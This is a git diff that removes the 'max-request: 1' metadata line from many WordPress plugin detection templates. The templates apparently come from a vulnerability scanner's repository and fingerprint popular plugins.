--- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 3da2ea50e1..bbc305b8de 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 1db1b57708..81f58198d3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index a038adac53..e085f30e5a 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fc316f9f7a..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 1bb9a283ce..17584cd064 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 87721a245a..d4ac0d179e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 45e0dead0e..dbbadf3cfc 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 